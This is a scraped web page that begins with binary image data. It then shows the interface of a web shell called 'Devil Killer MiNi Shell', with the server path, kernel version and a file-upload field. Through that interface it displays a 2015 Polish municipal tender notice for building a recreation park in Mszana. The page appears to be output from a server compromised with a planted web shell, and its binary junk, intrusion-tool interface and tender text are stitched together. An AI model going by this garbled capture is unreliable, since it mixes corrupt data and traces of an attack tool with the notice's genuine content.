JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150203/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150203/14317-N-2015.html

<p class="kh_header"><b>Mszana: Budowa Parku Aktywnej Rekreacji w Mszanie</b><br>
<b>Numer ogłoszenia: 14317 - 2015; data zamieszczenia: 03.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mszana , ul. 1 Maja 81, 44-325 Mszana, woj. śląskie, tel. 32 4759740, 4759755.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mszana.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Parku Aktywnej Rekreacji w Mszanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zagospodarowania terenów przy ulicy Tuskera w Mszanie, wzdłuż potoku Mszanka, w kierunku budowy Parku aktywnej rekreacji w Mszanie. 
Przedmiot zamówienia obejmuje realizację I etapu robót budowlanych dla terenu zawartego pomiędzy linią potoku Mszanka do skarpy za wzdłużnym rowem, w zakresie określonym na załączniku graficznym - projekcie zagospodarowania terenu.
Dodatkowo przedmiot zamówienia obejmuje realizację robót elektrycznych związanych z oświetleniem terenu i prac związanych z montażem systemu monitoringu zewnętrznego, a ujętych w projekcie budowlanym dla etapu II.
A. Zakres robót budowlanych obejmuje zagospodarowanie płaskiego terenu wzdłuż południowego brzegu rzeki Mszanki na długości 250 m do skarpy za wzdłużnym rowem melioracyjnym, z wykonaniem następujących elementów składowych parku:
1. ścieżki spacerowo-biegowej przy skarpie południowego brzegu Mszanki,
2. sieci ścieżek rowerowo-spacerowych okalających placyki aktywnej rekreacji,
3. siłowni terenowej z urządzeniami sportowymi, w tym zestaw dla osób niepełnosprawnych,
4. plac zabaw dla najmłodszych w formie morskiego okrętu,
5. placu ze ścianą wspinaczkową,
6. boiska do siatkówki plażowej,
7. skateparku.
Przedmiotowe części aktywnej rekreacji uzupełnione zostaną elementami małej architektury, kładkami drewnianymi położonymi nad rowami melioracyjnymi oraz niewielkimi nasadzeniami dodatkowej zieleni. Ponadto przewiduje się połączenie schodami terenowymi platformy widokowej przed głównym wejściem na cmentarz przykościelny z układem ścieżek rowerowo-spacerowych na odcinku trasy dojazdowej dla służb komunalnych i ratowniczych z rejonu parkingu do placyków aktywnej rekreacji sportowej.
Zakres przedmiotu zamówienia obejmuje również wykonanie oświetlenia ścieżek i placyków i wykonanie monitoringu wybranych elementów parku ujętych w projekcie budowlanym dla etapu II a obejmującymi swym zakresem teren przewidywanych robót budowlanych będących przedmiotem zamówienia.
ZESTAWIENIE POWIERZCHNI :
1. powierzchnia objęta przedmiotem zamówienia: 16 866,08 m2;
2. powierzchnia ścieżki A-A1 z kostki betonowej 582,00 m2;
3. powierzchnia ścieżki B-B1 z kostki betonowej 581,00 m2;
4. powierzchnia ścieżek z nawierzchni mineralnej 1 756,00 m2;
5. powierzchnie z piaskiem :
- boisko do siatkówki plażowej - powierzchnia 130 m2, warstwa piasku 30 cm;
- plac zabaw dla najmłodszych (statek) - powierzchnia 42,12 m2, warstwa piasku 30 cm;
6. powierzchnie placyków dla małej architektury :
- siłownia - nawierzchnia bezpieczna - pow: 218,55 m2, obrzeża betonowe 8/30 cm na ławie bet. gr. 10 cm - 73,35 mb;
- ścianka wspinaczkowa - nawierzchnia bezpieczna - pow: 54,40 m2, obrzeża betonowe 8/30 na ławie bet. gr. 10 cm - 26,15 mb;
- skatepark - nawierzchnia betonowa - pow: 215,15 m2 , krawężnik betonowy 15/30 cm, na ławie bet. gr. 15 cm - 60 mb;
POZOSTAŁE DANE :
1. powierzchnia rowów do regulacji - na gł. 10cm 392,00 m2,;
2. powierzchnia do zdjęcia 20 cm warstwy humusu 2 919,00 m2,;
3. długość opaski chodnika z k. granitowej 10/10 na ławie bet. A-A1 252,00 mb,;
4. długość opaski chodnika z k. granitowej 10/10 na ławie bet. B-B1 259,00 mb,;
5. długość obrzeża z tworzywa sztucznego na ścieżkach z naw. Mineralnej 1310,00 mb (np. typu EKO-BORD 58/80mm, kotwa met. dł. 300 mm i ława bet. C12/15),;
6. rozbiórka 3 przepustów betonowych i montaż nowych O 40 mm: nr1 - 7,50 m; Nr2 - 7,50 m; Nr3 - 7,50 m,;
7. gabiony:
- gabion 40x40 długość 134,40 mb,;
- gabion z ławką długość 22,10 mb,;
8. nawierzchnia gres ozdobny, powierzchnia 421,58 m2.
Części składowe parku.
1. Ścieżka spacerowo-biegowa.
Ścieżka spacerowo-biegowa usytuowana została przy skarpie wzdłuż południowego brzegu Mszanki. Ścieżka o szerokości 1,5 m na podbudowie wzmacniająco odsączającej, wyłożona nawierzchnią mineralną. Projektowany układ przestrzenny oraz warstw ujęty został w części drogowej projektu. Ścieżka wydzielona została od pozostałych terenów aktywnej turystyki linią muru z gabionów, na których w odległości co kilka metrów ulokowano siedziska drewniane.
2. Sieć ścieżek rowerowo-spacerowych.
Sieć ścieżek rowerowo - spacerowych okalających i łączących ze sobą placyki aktywnej rekreacji. Ścieżki z nawierzchnią mineralną - szerokość 3m. Ścieżki z kostki betonowej i granitowej - szerokość 3m (ścieżki wyłącznie rowerowo-spacerowe) i 3,5m (ścieżka poza funkcją rowerowo-spacerową może pełnić również funkcję jezdną, może zostać udostępniona dla służb komunalnych i ratunkowych). W miejscu przecięcia ścieżek z rowami melioracji zaprojektowano drewniane kładki. Projekt drewnianych kładek ujęty został w części konstrukcyjnej, natomiast warstwy ścieżek zostały ujęte w części drogowej dokumentacji projektowej.
3. Siłownia terenowa.
Siłownia terenowa z urządzeniami sportowymi, w tym zestaw dla osób niepełnosprawnych.
Wykaz urządzeń:
zestaw dla osób niepełnosprawnych 1 szt. (wymagany atest urządzenia)
- biegacz 1 szt.;
- twister 1 szt. 3 stanowiska;
- wioślarz 1 szt.;
- orbitrek 2 szt.;
- motylek 1 szt. 2 stanowiska;
- prasa nożna 1 szt. 2 stanowiska;
Proponowane urządzenia siłowni terenowej to elementy gotowe, dostępne na rynku, wykonane zgodnie z obowiązującymi normami oraz posiadające odpowiednie atesty. Siłownia usytuowana na utwardzonej nawierzchni bezpiecznej. Ze względu na usytuowanie nad przebiegiem sieci kanalizacyjnej wymaga się, aby nawierzchnia bezpieczna na tym placyku była układana z elementów prefabrykowanych, możliwych do demontażu w przypadku wystąpienia w tym miejscu awarii sieci. Układ warstw nawierzchni ujęty został w części drogowej dokumentacji projektowej.
Placyk siłowni terenowej wyposażony jest w elementy małej architektury:
- ławka parkowa 4 szt.;
- kosz na śmieci 1 szt.;
- tablica informacyjna 1 szt.;
- stojak rowerowy 1 szt.;
4. Plac zabaw dla najmłodszych
Urządzenie zabawowe w formie morskiego okrętu pełniące funkcję piaskownicy wraz ze zjeżdżalnią. Statek ustawiony na piasku, wykonany z elementów drewnianych oraz płyty PE. Drewniany element współgra z piaskowym podłożem. Element wykonany zgodnie z obowiązującymi normami oraz posiadający odpowiednie atesty.
Plac zabaw dla najmłodszych wyposażony jest w elementy małej architektury:
- ławka parkowa 3 szt.;
- kosz na śmieci 1 szt.;
- tablica informacyjna 1 szt.
5. Plac ze ścianą wspinaczkową
Projektuje się ściankę wspinaczkową na małym okrągłym placyku w północno - zachodniej części parku, jako gotowy element z tworzywa sztucznego, usytuowaną na placu na ławie betonowej z wyłożoną nawierzchnią bezpieczną (warstwa wierzchnia monolityczna). Układ warstw nawierzchni ujęty został w części drogowej niniejszego opracowania.
Gotowa ścianka wspinaczkowa wykonana zgodnie z obowiązującymi normami oraz posiadająca odpowiednie atesty. Wymiary ścianki gwarantują bezpieczeństwo użytkowania, bez konieczności asekuracji specjalistycznym sprzętem do wspinaczki.
Plac ze ścianką wspinaczkową wyposażony jest w elementy małej architektury:
- ławka parkowa 5 szt.;
- kosz na śmieci 1 szt.;
- tablica informacyjna 1 szt.;
- stojak rowerowy 1 szt.;
6. Boisko do siatkówki plażowej.
Boisko do siatkówki plażowej z nawierzchnią z piasku. Wyposażenie boiska jako gotowe elementy: słupki stalowe - 2 szt, siatka z antenkami - 1 szt, taśmy wyznaczające linie gry ze śledziami do mocowania w podłożu - 1 szt.
W sąsiedztwie boiska znajdują się elementy małej architektury:
- ławka parkowa 4 szt.
- kosz na śmieci 1 szt.
- tablica informacyjna 1 szt.
- stojak rowerowy 1 szt.
7. Stoły do ping - ponga
Teren z 2 stołami do ping - ponga zaprojektowany z gotowych elementów z betonu, ustawionych na naturalnym podłożu trawiastym. Usytuowanie stołów uwzględniające strefy bezpieczeństwa użytkowania. Elementy konstrukcyjne stołu z betonu. Siatka wykonana z blachy ocynkowanej, na stale zamontowana do stołu. Stoły wykonane zgodnie z obowiązującymi normami oraz posiadające odpowiednie atesty.
Teren wyposażony w elementy małej architektury:
- ławka parkowa 1 szt.
- kosz na śmieci 1 szt.
- stojak rowerowy 1 szt.
8. Skatepark.
Skatepark z nawierzchnią betonową wyposażony w urządzenia przeznaczone do wyczynowej jazdy na rolkach i deskorolkach. Układ warstw nawierzchni betonowej ujęty został w części drogowej dokumentacji projektowej.
Skatepark wyposażony w elementy:
- Bank Ramp 1 szt.
- Quarter Pipe 1 szt.
- Grinbox 1 +poręcz 1 szt.
- Grinbox 9 1 szt.
- Ławka 1 1 szt.
- Poll jam 1 szt.
Elementy skateparku to gotowe wyposażenie, wykonane ze sklejki laminowanej oraz stali galwanizowanej. Elementy wykonane zgodnie z obowiązującymi normami oraz posiadające odpowiednie atesty.
Plac wyposażony w elementy małej architektury:
- ławka parkowa 3 szt.
- kosz na śmieci 1 szt.
- tablica informacyjna 1 szt.
- stojak rowerowy 1 szt.
9. Elementy małej architektury.
Uzupełniające elementy małej architektury obejmują następujący asortyment:
- ławka parkowa bez oparcia Ł1 - 20 szt. Wymiary siedziska 170x40. Wysokość siedziska 44 cm. Elementy drewniane ławki impregnowane i lakierowane. Podstawa ławki - element betonowy wykonany z kruszyw płukanych.
- ławka parkowa z oparciem Ł2 - 12 szt. Wymiary siedziska 170x40 cm. Głębokość z oparciem 78 cm. Wysokość siedziska 44 cm. Elementy drewniane ławki impregnowane i lakierowane. Podstawa ławki - element betonowy wykonany z kruszyw płukanych.
- ławka na gabionach Ł3 - 13 szt.. Drewniane siedzisko, mocowane do stalowych gabionów, wymiary siedziska 170x40 cm. Elementy drewniane ławki impregnowane i lakierowane. Podstawa ławki - stalowe gabiony wypełnione kruszywem.
- kosz na psie nieczystości - 3 szt. Specjalny pojemnik na odchody, wyposażony w zasobnik na zestawy higieniczne, zabezpieczony przed otwarciem przez niepowołane osoby. W zestawie torebki na odchody z opisem użycia. Materiał: tworzywo sztuczne, stal. Pojemnik jako element gotowy i montowany na stałe do podłoża, betonowanie w gruncie elementu kotwiącego.
- kosz na śmiec i - 18 szt. Kosz drewniany z wkładem z blachy ocynkowanej, malowanej proszkowo. Słupek stalowy malowany proszkowo. Elementy drewniane impregnowane, lakierowane. Montaż kosza przez zabetonowanie w gruncie elementu kotwiącego.
- stojak na rowery - 4 szt. Stojak żeliwno stalowy. Stal ocynkowana, malowana proszkowo. Ilość miejsc - 10. Wysokość 80 cm, długość 250 cm, szerokość 30 cm. Montaż stojaka poprzez zabetonowanie w gruncie elementów kotwiących.
- tablica informacyjna - 7 szt. Tablica informacyjna stalowa, ocynkowana, malowana proszkowo. Wypełnienie tablicy z pleksi. Montaż tablicy poprzez zabetonowanie w gruncie elementów kotwiących.
- słupek ograniczający dostęp stały - Sł1 - 1 szt. Wykonany ze stali, ocynkowany, malowany proszkowo. Sposób mocowania - poprzez przykręcenie kołkami rozporowymi do utwardzonego podłoża (kostka betonowa). Wysokość słupka 51 cm. Rura fi 60x3 mm.
- słupek ograniczający dostęp składany - Sł2 - 2 szt. Wykonany ze stali, ocynkowany, malowany proszkowo. Element składany z wkładką patentową, zamykany. Sposób mocowania - poprzez przykręcenie kołkami rozporowymi do utwardzonego podłoża (kostka betonowa). Wysokość słupka 51 cm.
- Gabiony o wymiarach: szerokość 40 cm i wysokość 40 cm. Odcinkowo na gabionach umocowane siedziska drewniane. Kosze gabionowe osadzone na podbudowie z kruszywa sypkiego 40 cm od poziomu terenu. Szerokość podbudowy kształtuje się na poziomie 60cm. Kosze gabionowe wypełnione grysem ozdobnym o dużej frakcji.
10. Wyposażenie dodatkowe
Kompresor do pompowania rowerów - 1 szt. - gotowy element, mocowany na stałe do nawierzchni utwardzonej. Stoisko do bezpiecznego oparcia roweru.
11. Nasadzenia zieleni
Nasadzenia zieleni w dwu obszarach: przed gabionami wydzielającymi ścieżkę spacerowo-biegową w północnej części terenu parkowego, wzdłuż biegu rzeczki Mszanki oraz we wschodniej części terenu parkowego, wzdłuż jego wschodniej granicy. Przy gabionach projektuje się głownie zieleń niską, byliny, z kolei wzdłuż granicy wschodniej projektuje się nasadzenia drzew rożnych gatunków, celem urozmaicenia krajobrazu w rożnych porach roku i stworzenia efektownej zieleni parawanowej dla usytuowanych poza parkiem domostw. Ilość i gatunkowość nasadzeń określone zostały w dokumentacji projektowej.
B. Oświetlenie i monitoring CCTV.
Zakres robót obejmuje:
- oświetlenie parkowe;
- gniazda wtykowe w rozdzielniach słupkowych;
- linie zasilające obwody siły i oświetlenia;
- uziemienia ochronne;
- kanalizację kablową i przepusty kablowe;
- monitoring cctv wybranych obszarów w parku;
- demontaże i przełączenia istniejącego oświetlenia.
Oświetlenie i monitoring CCTV, w ramach przedmiotu zamówienia, realizowane będą tylko w części obejmującej teren objęty dokumentacją projektową - Zagospodarowanie terenów przy ul. Tuskera w Mszanie, wzdłuż potoku Mszanka, w kierunku budowy Parku aktywnej rekreacji w Mszanie - ETAP I.
Szczegółowy opis przedmiotu zamówienia stanowią:
- Projekt budowlany Zagospodarowanie terenów przy ul. Tuskera w Mszanie, wzdłuż potoku Mszanka, w kierunku budowy Parku aktywnej rekreacji w Mszanie - ETAP I;
- Projekt budowlany Zagospodarowanie terenów przy ul. Tuskera w Mszanie, wzdłuż potoku Mszanka, w kierunku budowy Parku aktywnej rekreacji w Mszanie - ETAP II - w części dotyczącej oświetlenia i monitoringu CCTV obszaru objętego realizacją robót budowlanych w etapie I;
- Specyfikacja techniczna,
- Przedmiar robót, 
stanowiące załączniki do Specyfikacji Istotnych Warunków Zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.12.00-0, 45.11.27.00-2, 45.11.27.10-5, 45.11.27.20-8, 45.11.27.11-2, 45.31.12.00-2, 45.31.61.00-6, 45.31.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 20 000,00 zł  (słownie złotych: dwadzieściatysięcy00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed terminem składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną obejmującą swym zakresem zagospodarowanie terenów w kierunku rekreacyjno - sportowym zawierające budową pieszych bądź pieszo - rowerowych ciągów komunikacyjnych, budowę placu zabaw i budowę obiektów sportowo - rekreacyjnych, o łącznej wartości wykonanych robót nie mniejszej niż 800 000, - zł, (osiemsettysięcy zł) z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełniania warunku dokonana zostanie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy i wykazu wykonanych robót budowlanych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca dysponują lub będzie dysponował osobami, które będą uczestniczyły w wykonywaniu zamówienia, w tym:
1. osobą zdolną do kierowania budową posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów obowiązujących w dacie ich wydania,
2. osobą zdolną do kierowania budową posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów obowiązujących w dacie ich wydania.
Ocena spełniania warunku dokonana zostanie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy, wykazu osób uczestniczących w wykonywaniu zamówienia i oświadczenia Wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że posiada środki finansowe lub zdolność kredytową, w wysokości nie mniejszej niż 1 000 000,00 zł (jedenmilion zł).
W celu oceny spełnienia przez Wykonawcę tego warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy oraz przedłożonej przez Wykonawcę informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej;
2. Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą  niż 400 000,00 zł (czterysta tysięcy zł).
W celu oceny spełnienia przez Wykonawcę tego warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy oraz przedłożonej przez Wykonawcę kopii zawartej polisy ubezpieczeniowej wraz z potwierdzeniem jej opłacenia lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
